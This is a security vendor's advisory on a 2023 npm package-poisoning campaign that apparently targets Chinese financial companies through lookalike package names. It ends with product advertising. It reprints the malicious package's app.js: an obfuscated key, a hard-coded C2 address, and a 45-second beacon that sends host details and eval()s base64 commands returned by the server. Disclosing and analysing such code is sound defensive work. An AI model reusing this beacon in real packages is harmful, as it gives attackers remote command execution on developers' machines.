The first open source component poisoning attack against a domestic financial company

Brief description

On August 9, 2023, Murphy Security detected that the ws-paso-jssdk component package, published to the NPM registry by a user named snugglejack_org (email address: [email protected]), generated suspicious traffic to https://ql.rustdesk[.]net. It has been confirmed that the package carries a remote-control script that receives and executes system commands from an attacker-controlled C2 server. The package was taken down from the NPM registry at 7:21 on August 10, 2023.

Continued tracking found that the attacker went on to publish similar malicious packages, such as pingan-vue-floating, to the NPM registry, with the C2 address of the poisoned package changed to 62.234.32.226, an IP allocated by Tencent Cloud in Beijing. The poisoned packages are named after pingan, ynf and similar strings, so they are very likely aimed at domestic companies (such as China *An). The attacker mimics the names of components on the target company's private registry and lures the company's internal users into downloading the poisoned component. This is the first publicly disclosed open source component poisoning attack against a domestic financial company.

As of August 14, 2023, the poisoned packages can still be downloaded from the Tencent NPM mirror (see Figure 1). Users can check whether malicious components have been installed with npm ls. For batch detection of poisoned packages, contact Murphy Security to use its product tools for a one-click investigation across the entire network. A large-scale attack-and-defense exercise is currently under way, and everyone is advised to investigate carefully.

Figure 1: Tencent Cloud NPM component download address 

Poisoning analysis

Take the pingan-vue-floating-0.0.7 component as an example. The package starts itself as a daemon process through pm2, sends a request to the attacker-controlled C2 server every 45 seconds as a heartbeat, and then receives and executes the system commands returned by the attacker:

//pingan-vue-floating-0.0.7/app.js

// AES key assembled at runtime from base-36 conversions and character-code
// arithmetic, so the key string never appears as a literal in the source.
const key = (37532).toString(36).toLowerCase()+(27).toString(36).toLowerCase().split('').map(function(S){return String.fromCharCode(S.charCodeAt()+(-39))}).join('')+(1166).toString(36).toLowerCase()+(function(){var v=Array.prototype.slice.call(arguments),A=v.shift();return v.reverse().map(function(N,Q){return String.fromCharCode(N-A-10-Q)}).join('')})(43,107,106,169,150,111,106)+(914).toString(36).toLowerCase()+(function(){var k=Array.prototype.slice.call(arguments),D=k.shift();return k.reverse().map(function(r,I){return String.fromCharCode(r-D-8-I)}).join('')})(36,167,112)
// Attacker-controlled C2 server.
const url = "http://62.234.32.226:8888"
// Marker file in the temp directory; used below to run the beacon only once per host.
const filename = path.join(os.tmpdir(), 'node_logs.txt');
// Browser-like User-Agent so the beacon looks like ordinary web traffic.
const headersCnf = {
    headers: {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134'
    }
};
…… // helper definitions (sendRequest, aesEncrypt, checkFile, createTmpFile) are omitted in the original excerpt
function heartbeat(){
    // Host fingerprint (hostname, machine id, platform), AES-encrypted and posted to /api/index.
    const requestData = {
        hostname: os.hostname(),
        uuid:machineIdSync({original: true}),
        os:os.platform(),
    };
    sendRequest(url+'/api/index',aesEncrypt(JSON.stringify(requestData)))
    // Task poll: /api/captcha returns a task for this machine id.
    const task = {
        uuid:machineIdSync({original: true}),
    }
    sendRequest(url+'/api/captcha',aesEncrypt(JSON.stringify(task))).then(result => {
        try{
            if (result !== undefined) {
                // The "code" field is base64-decoded and executed directly with eval().
                const data = JSON.parse(result);
                const decodedData = Buffer.from(data.code, 'base64').toString();
                eval(decodedData)
            }
        }catch (error){
            // Errors are swallowed so a bad task never crashes the beacon.
        }
    });

}

function app(){
    // If the marker file already exists, the beacon is not started a second time.
    const result = checkFile();
    if (result.exists) {
        return
    } else {
        createTmpFile();
        // Heartbeat every 45 seconds.
        setInterval(heartbeat, 45000);
    }
}
app()

List of all components poisoned by the attacker in this incident

Tip: Please do your own investigation!

Troubleshooting tools and poisoning intelligence

1. Murphy Security provides products that block poisoning attacks on open source components in real time

Murphy Security's private registry gateway product detects and intercepts poisoning events in central registries such as npm, pip and maven in real time, and supports baseline management of high-risk vulnerabilities. It has been deployed by dozens of customers, including China Mobile.

2. Murphy Security provides real-time open source component poisoning intelligence alerts, available by subscription

Murphy Security's 0day vulnerability and poisoning intelligence covers the latest 0day, 1day and poisoning alerts. All intelligence is researched and vetted by security experts so that enterprises obtain first-hand, high-quality vulnerability and poisoning intelligence, with more than 25 detailed analysis fields beyond those in the CVE vulnerability database. This product is currently used by dozens of customers, including Ant, Meituan and China Telecom.


Apply for a demo or trial:

https://www.murphysec.com/enterprise


Source: https://blog.csdn.net/murphysec/article/details/132300579